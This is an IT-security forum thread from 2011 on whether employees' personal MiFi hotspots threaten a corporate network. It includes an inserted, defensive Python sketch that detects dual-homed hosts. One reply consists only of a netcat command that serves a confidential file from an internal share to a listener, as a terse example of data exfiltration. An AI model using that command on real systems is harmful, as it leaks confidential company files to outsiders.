-
January 13th, 2011, 08:10 PM
#1
Wireless in the Workplace
Hi guys and gals, I need a little help.
We recently purchased and installed a wifi security product called HiPath Wireless Manager, which is currently owned by Enterasys. Basically, using sensors scattered around the buildings where I work, it detects signals from WiFi devices and tries to triangulate their positions on maps we've put in HiPath's locations database. It also has the capability to block communications between devices, such as between an authorized client and a rogue access point. It's a pretty decent product; it needs a little work, but it'll do.
That's not the problem.
Lately, users have been bringing in these MiFi devices--WiFi routers which connect to a cellular network, for those who don't know. Some of these run off batteries, and are about half the size and twice the thickness of a credit card. Our Internet security policy states that you are not allowed to have any device connected to our internal network and another network simultaneously. It also states that no non-corporate-owned or managed device can connect to our internal network. These MiFi devices don't allow people to connect to our internal network; they simply allow them to connect straight to the internet.
My boss is wondering why I'm worried about these MiFi devices, and I keep telling her that although we can see the MiFi devices, we are unable to see whether or not whatever's associated with these devices (laptop, etc) is connected to our internal network via ethernet without chasing down each signal, and physically looking in the cubicles to see whether or not their laptops are connected to the networks. Also, these employees could be wasting time surfing the net without the fear of being logged. The boss says that's more of a productivity problem, and not a security problem.
So, can someone give me a case that these MiFi devices are not only bad for productivity, but also from a security standpoint?
-
January 13th, 2011, 08:33 PM
#2
nc -lv 1234 < \\server\share$\supersecret.doc
"Those of us that had been up all night were in no mood for coffee and donuts, we wanted strong drink."
-HST
-
January 13th, 2011, 09:20 PM
#3
Originally Posted by NukEvil
So, can someone give me a case that these MiFi devices are not only bad for productivity, but also from a security standpoint?
Depending on the security settings of each station/laptop/whatever the MiFi is connected to, it could be an open hole to the machines it connects with and the internal network.
Apart from that.... you say your security policy doesn't allow this? Then why is it possible from a technical point of view to work? Can't you lock down the company's computers? We would need much more info on your network and hardware and OS involved in the whole thing.
I don't know what systems you are using, but on the PCs and laptops I administer, the user can not connect to any wifi that is not set in the config files, he can not install any other wifi client since he does not have access to install such, and he has no access to add any USB devices either (so not even a router/modem/MiFi with usb would work). (That's for Linux, I have no idea if that is even possible with Windows).
The security policy should not ONLY state what is allowed and what not, but it should also ENFORCE what it states using technical means.
Last edited by instronics; January 13th, 2011 at 09:22 PM.
Ubuntu-: Means in African : "I'm too dumb to use Slackware"
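A sketch of one technical check for the "no device on the internal network and another network simultaneously" rule discussed above. This is an added example, not part of the original thread: it assumes a managed Linux host, parses the text produced by `ip -o -4 addr show`, and treats 10.0.0.0/8 as the corporate range; the sample output and interface names are constructed.

```python
import ipaddress

# Assumed corporate address space (constructed for this example).
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]

def parse_ip_addr(output):
    """Parse `ip -o -4 addr show` text into (interface, IPv4Address) pairs."""
    pairs = []
    for line in output.splitlines():
        fields = line.split()
        # Expected shape: "<idx>: <ifname> inet <addr>/<prefix> ..."
        if len(fields) < 4 or fields[2] != "inet":
            continue
        iface = ipaddress.ip_interface(fields[3])
        if iface.ip.is_loopback or iface.ip.is_link_local:
            continue  # not evidence of a second network
        pairs.append((fields[1], iface.ip))
    return pairs

def dual_homed(output, internal_nets=INTERNAL_NETS):
    """Return (internal, external) interface names if the host is on both."""
    internal, external = [], []
    for name, ip in parse_ip_addr(output):
        on_corp = any(ip in net for net in internal_nets)
        (internal if on_corp else external).append(name)
    # The policy is violated only when both sides are live at the same time.
    if internal and external:
        return sorted(set(internal)), sorted(set(external))
    return None

# Constructed sample: wired corporate link plus a Wi-Fi link to a hotspot.
SAMPLE_VIOLATION = """\
1: lo    inet 127.0.0.1/8 scope host lo\\       valid_lft forever preferred_lft forever
2: eth0    inet 10.20.30.40/24 brd 10.20.30.255 scope global eth0\\       valid_lft forever preferred_lft forever
3: wlan0    inet 192.168.1.23/24 brd 192.168.1.255 scope global wlan0\\       valid_lft forever preferred_lft forever
"""

# Constructed sample: the same host with only the wired corporate link up.
SAMPLE_OK = """\
1: lo    inet 127.0.0.1/8 scope host lo\\       valid_lft forever preferred_lft forever
2: eth0    inet 10.20.30.40/24 brd 10.20.30.255 scope global eth0\\       valid_lft forever preferred_lft forever
"""

if __name__ == "__main__":
    print(dual_homed(SAMPLE_VIOLATION))
    print(dual_homed(SAMPLE_OK))
```

A check like this only covers machines the company manages; it says nothing about privately owned laptops that never touch the wired network.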
-
January 13th, 2011, 09:31 PM
#4
I should probably have mentioned that the laptops aren't company-owned, either. The employees bring both laptop and mifi device from home. And they don't connect them to the internal network; they simply want to access the internet with them.
-
January 14th, 2011, 11:47 AM
#5
Originally Posted by NukEvil
I should probably have mentioned that the laptops aren't company-owned, either. The employees bring both laptop and mifi device from home. And they don't connect them to the internal network; they simply want to access the internet with them.
Are these private laptops used for company work? Do they carry company files? Do they connect to anything company related other than using them for internet during company operating hours? Is your concern for the mifi's only for their private laptops? What does your security policy say about using private laptops?
I'm sorry dude, but from what you have said so far, it's still not easy to understand the 'what-is' situation, and the 'should-be' situation.
If the private laptops are not connected to the company network, and no company work is performed on the private laptops, then there is no real security risk, but it sounds rather like a productivity issue.
IF they use their private laptops for company work but cannot connect to the internal network, then how does their 'work' transfer from the company network on to the private laptops? (usb, email, ftp over the net)???? And if that's the case, then IT IS a security concern, although once again the company policy should dictate and enforce counter measures to these problems.
Cheers
Ubuntu-: Means in African : "I'm too dumb to use Slackware"
-
January 14th, 2011, 02:14 PM
#6
That's the thing; we don't know if they use the laptops only for internet access or if they also do work on them. I kinda doubt they'd use them for working purposes because of the desktop computer that every occupied cubicle has.
As in my first post:
Our Internet security policy states that you are not allowed to have any device connected to our internal network and another network simultaneously. It also states that no non-corporate-owned or managed device can connect to our internal network.
It doesn't really state anything about countermeasures, other than "blah blah subject to punishment up to and including termination and possibly prosecution"...
-
January 14th, 2011, 08:58 PM
#7
Originally Posted by NukEvil
That's the thing; we don't know if they use the laptops only for internet access or if they also do work on them. I kinda doubt they'd use them for working purposes because of the desktop computer that every occupied cubicle has.
As in my first post:
Our Internet security policy states that you are not allowed to have any device connected to our internal network and another network simultaneously. It also states that no non-corporate-owned or managed device can connect to our internal network.
It doesn't really state anything about countermeasures, other than "blah blah subject to punishment up to and including termination and possibly prosecution"...
So the only 'security' breach that I see (maybe someone else can see more) is, that if a user uses a USB stick to copy files from his cubicle PC and copies them on to his laptop, the files are as safe as the user's private laptop.
In any event, if that's not the case... then it's a productivity issue since they seem to need to bring in their own 'internet' to go online. I presume that using the net from the company PCs is no fun? Locked down etc?
However.. what makes "YOU" think there is a security issue involved? Am I missing something maybe?
Cheers.
Ubuntu-: Means in African : "I'm too dumb to use Slackware"
-
January 14th, 2011, 11:09 PM
#8
So, can someone give me a case that these MiFi devices are not only bad for productivity, but also from a security standpoint?
I don't understand how productivity loss isn't sufficient enough to warrant attention.
From a security standpoint, these users are introducing unmoderated internet into the workplace. If you can't guarantee that users won't connect their laptops to your internal network, then it is a security problem.
The object of war is not to die for your country but to make the other bastard die for his - George Patton
-
January 15th, 2011, 11:16 AM
#9
-
January 17th, 2011, 03:02 AM
#10
Originally Posted by nihil
I think that the authentication works on the MAC address of the attached device, but I haven't really investigated.
I do wonder if I removed the USB WiFi adapter from one machine, would it work in another; without re-authentication?
It authenticates...most of the mifi units, if not all of them, are a Novatel device, commonly the 2200. I have one. You have to authenticate, unless the owner of the device turned off the protection. I think they use WEP default, but you can change it to WPA2. Virgin Mobile recently dumped a prepaid version on retailers that rides on Sprint's 3G network. $40/month for unlimited data. They did recently announce, though, that they will cap the speeds to 256k after you break the 5Gb mark for a month.
I don't think they represent any more of a risk to your network than a usb thumb drive.
About the work productivity thing. Heh, guess that depends on what school of thought you come from.
Every now and then, one of you won't annoy me.